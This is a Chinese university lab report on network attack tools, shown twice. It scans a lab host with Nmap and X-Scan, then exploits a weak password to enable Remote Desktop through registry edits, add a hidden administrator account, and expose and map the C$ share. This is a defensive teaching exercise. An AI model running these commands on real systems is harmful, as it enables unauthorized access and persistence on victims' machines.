网络安全实验二

网络安全实验报告

学号: 姓名: 班级:

实验项目编号: B031120502 实验项目名称: 网络分析工具软件的使用

一、实验目的:

1. 会使用工具查找主机漏洞

2. 学会对弱口令的利用

3. 了解开启主机默认共享以及在命令提示下开启服务的方法

4. 通过实验了解如何提高主机的安全性

二、实验环境:

网络安全实验平台(装有windows 、 linux 等多个系统虚拟机及相应软件)

三、实验原理(或要求):

实验原理如图:

四、实验步骤:

(1)主机A 点击工具栏“Nmap”按钮,启动Nmap 工具,输入命令:nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.16.0.160,开始扫描。

(2) 主机A 点击工具栏“X-Scan ”按钮启动X-Scan ,点击菜单栏中的“设置”按钮,在弹出菜单中点击“扫描参数”,在“检测范围”中填写主机B 的IP ,展开左侧树状接口中的“全局设置”在“扫描模块”选项中分别勾选“开放服务”、“NT-Server 弱口令”、“NetBios 信息”三个选项,其它选项为空,点击“确定”按钮,完成扫描参数设定。

(3) 主机A 点击

开始进行扫描。扫描结束后,自动弹出检测报告。

(4)主机A 点击工具栏中“远程桌面”按钮,打开远程桌面连接,尝试登录主机B ,在远程桌面中输入主机B 的IP ,点击“连接”按钮.

(5) 通过修改注册表开启主机B 远程桌面:

①主机A 登录成功后在命令提示符下执行“reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" ”查看执行结果.

②主机A 在命令提示符下执行“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ”,删除该键值,

③主机A 新建一个fDenyTSConnections 值为0的注册表项,在命令提示符下执行“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”确定,操作成功

(6)建立新用户

①主机A 再次使用“test ”账户用“telnet ”命令登录主机B ,并在命令提示符下执行“net user myadmin 1234 /add”,“myadmin ”为用户名,“1234”为密码。

②主机A 将myadmin 用户添加到administrators 组中,在命令提示符下执行“net localgroup administrators myadmin /add”。

③主机A 使用“myadmin ”账户远程桌面登录主机B ,查看效果。

(7)添加磁盘映射

①主机A 使用“myadmin ”账户telnet 登录主机B ,在命令提示符下输入“net share c$=c: /grant:myadmin,full”。将主机B 中的C 盘映射为c$,并赋予完全控制权限.

②主机A 退出telnent ,并与主机B 建立ipc 连接,主机A 在命令提示符下输入“net use \\主机B 的IP\ipc$ "1234" /user:"myadmin"”

③主机A 继续执行命令“net use y: \\172.16.0.160\c$”将主机B 开放的默认共享C 盘映射为自己的本地磁盘Y ,如图2-2-12所示,这样,操作自己的Y 盘就是操作主机B 的C 盘。

④主机A 打开“我的电脑”查看新增加的网络驱动器Y 盘,并尝试对Y 盘的文件进行增、删、改操作。

五、实验记录或结果

发现安全漏洞:

弱口令:

由于主机B 没有开启远程桌面的服务,结果出现了“客户端无法连接到远程计算机”的提示,远程登录失败。

通过修改注册表开启主机B 远程桌面:

添加磁盘映射:

六、思考题:

寻找攻击目标的一般方法有哪些(至少说出三种)。

1. 开放来源信息;

2. 攻击者会对一个域名执行whois 程序以找到附加的信息;

3. 找到附加IP 地址的一个方法是对一个特定域询问DNS 。

网络安全实验报告

学号: 姓名: 班级:

实验项目编号: B031120502 实验项目名称: 网络分析工具软件的使用

一、实验目的:

1. 会使用工具查找主机漏洞

2. 学会对弱口令的利用

3. 了解开启主机默认共享以及在命令提示下开启服务的方法

4. 通过实验了解如何提高主机的安全性

二、实验环境:

网络安全实验平台(装有windows 、 linux 等多个系统虚拟机及相应软件)

三、实验原理(或要求):

实验原理如图:

四、实验步骤:

(1)主机A 点击工具栏“Nmap”按钮,启动Nmap 工具,输入命令:nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.16.0.160,开始扫描。

(2) 主机A 点击工具栏“X-Scan ”按钮启动X-Scan ,点击菜单栏中的“设置”按钮,在弹出菜单中点击“扫描参数”,在“检测范围”中填写主机B 的IP ,展开左侧树状接口中的“全局设置”在“扫描模块”选项中分别勾选“开放服务”、“NT-Server 弱口令”、“NetBios 信息”三个选项,其它选项为空,点击“确定”按钮,完成扫描参数设定。

(3) 主机A 点击

开始进行扫描。扫描结束后,自动弹出检测报告。

(4)主机A 点击工具栏中“远程桌面”按钮,打开远程桌面连接,尝试登录主机B ,在远程桌面中输入主机B 的IP ,点击“连接”按钮.

(5) 通过修改注册表开启主机B 远程桌面:

①主机A 登录成功后在命令提示符下执行“reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" ”查看执行结果.

②主机A 在命令提示符下执行“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ”,删除该键值,

③主机A 新建一个fDenyTSConnections 值为0的注册表项,在命令提示符下执行“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”确定,操作成功

(6)建立新用户

①主机A 再次使用“test ”账户用“telnet ”命令登录主机B ,并在命令提示符下执行“net user myadmin 1234 /add”,“myadmin ”为用户名,“1234”为密码。

②主机A 将myadmin 用户添加到administrators 组中,在命令提示符下执行“net localgroup administrators myadmin /add”。

③主机A 使用“myadmin ”账户远程桌面登录主机B ,查看效果。

(7)添加磁盘映射

①主机A 使用“myadmin ”账户telnet 登录主机B ,在命令提示符下输入“net share c$=c: /grant:myadmin,full”。将主机B 中的C 盘映射为c$,并赋予完全控制权限.

②主机A 退出telnent ,并与主机B 建立ipc 连接,主机A 在命令提示符下输入“net use \\主机B 的IP\ipc$ "1234" /user:"myadmin"”

③主机A 继续执行命令“net use y: \\172.16.0.160\c$”将主机B 开放的默认共享C 盘映射为自己的本地磁盘Y ,如图2-2-12所示,这样,操作自己的Y 盘就是操作主机B 的C 盘。

④主机A 打开“我的电脑”查看新增加的网络驱动器Y 盘,并尝试对Y 盘的文件进行增、删、改操作。

五、实验记录或结果

发现安全漏洞:

弱口令:

由于主机B 没有开启远程桌面的服务,结果出现了“客户端无法连接到远程计算机”的提示,远程登录失败。

通过修改注册表开启主机B 远程桌面:

添加磁盘映射:

六、思考题:

寻找攻击目标的一般方法有哪些(至少说出三种)。

1. 开放来源信息;

2. 攻击者会对一个域名执行whois 程序以找到附加的信息;

3. 找到附加IP 地址的一个方法是对一个特定域询问DNS 。


相关内容

  • 信息安全实验室建设方案
  • 信息安全与网络存储实验室 建设方案 2010年6月 目录 1 2 3 建设背景 . ............................................................................................................ ...

  • 大学网络实验室方案论证报告
  • 网络实验室测试实验方案论证报告 目 录 前 言 .................................................................. 1 一.计算机网络教育现状 ............................................. ...

  • 日本高校实验室安全与环境保护考察及启示_张志强
  • ISS N 1002-4956 CN11-2034/T 实 验 技 术 与 管 理 Ex perim ental Technology and M anagem ent 第27卷 第7期 2010年7月Vol. 27 No. 7 Ju l. 2010 世界大学实验室 日本高校实验室安全与环境 保护考 ...

  • 实验室安全活动月策划方案
  • 实验室安全活动月策划方案 一. 开展实验室安全活动月的意义及目的 实验室是科研创新成果的摇篮,实验室安全不容忽视.2013年,教育部发布了<教育部办公厅关于进一步加强高等学校实验室危险化学品安全管理工作的通知>(教技厅[2013]1号),实验室安全已成为高校事业发展不可忽视的重要问题之一 ...

  • 软件系网络工程实验室建设规划
  • 软 件 工 程 系 网络工程本科专业实验室建设规划 二○一一年五月 关于软件工程系网络工程本科专业 新建.扩建实验室.实习基地的规划报告 教务处.发展规划处: 根据学校升本工作需要,结合我系实际情况,在对现有校内实验室.实习实训基地等实践条件摸底的基础上,经过仔细讨论和慎重考虑,现提出关于网络工程本 ...

  • 无菌实验室
  • 无菌实验室 无菌试验室主要用于微生物学.生物医学.生物化学.动物实验.基因重组以及生物制品等研究使用的实验室统称洁净实验室-生物安全实验室. 一.实验室应用 2.无菌试验室.生物安全实验室由主实功能验室与其他实验室及辅助功能用房组成. 3.无菌试验室.生物安全实验室必须保证人身安全.环境安全.废弃物 ...

  • 实验室生物安全手册.
  • 目 录 批准 3 修订页 4 实验室生物安全手册说明 5 实验室生物安全方针和目标 6 管理要求 7 4.1概述7 4.2法律地位7 4.3组织机构7 4.4管理体系职责分配7 4.5关键岗位职责9 附录A 实验室生物安全组织机构框图 附录B 验室生物安全体系要素职责分配表 附录C 实验室生物安全管 ...

  • 高校实验室安全责任书
  • 高校实验室安全责任书 1.苏州大学体育学院实验室安全卫生管理责任书 苏州大学体育学院实验室,本着全心全意为师生服务的原则开展工作.为了确保实验室教学.科研工作的正常进行,确保全体前来进行实验的教师.学生的人生和财产安全,根据国家及学校的相关安全规定,并结合本院具体情况,特制定实验室安全卫生责任书. ...

  • 实验室安全管理
  • 浙商大设备„2011‟248号 浙江工商大学关于印发 实验室安全管理规定的通知 校内各部门: 现将<浙江工商大学实验室安全管理规定>予以印发,请遵照执行. 二○一一年十月十六日 浙江工商大学实验室安全管理规定 第一条 为明确实验室安全工作职责,落实安全保障措施,保证实验人员和国家财产的安 ...

  • 实验与工厂安全报告
  • 实验室与工厂安全报告 目 录 一前言 ..................................................................................................... 错误!未定义书签. 二化学品安全基础知识 ........ ...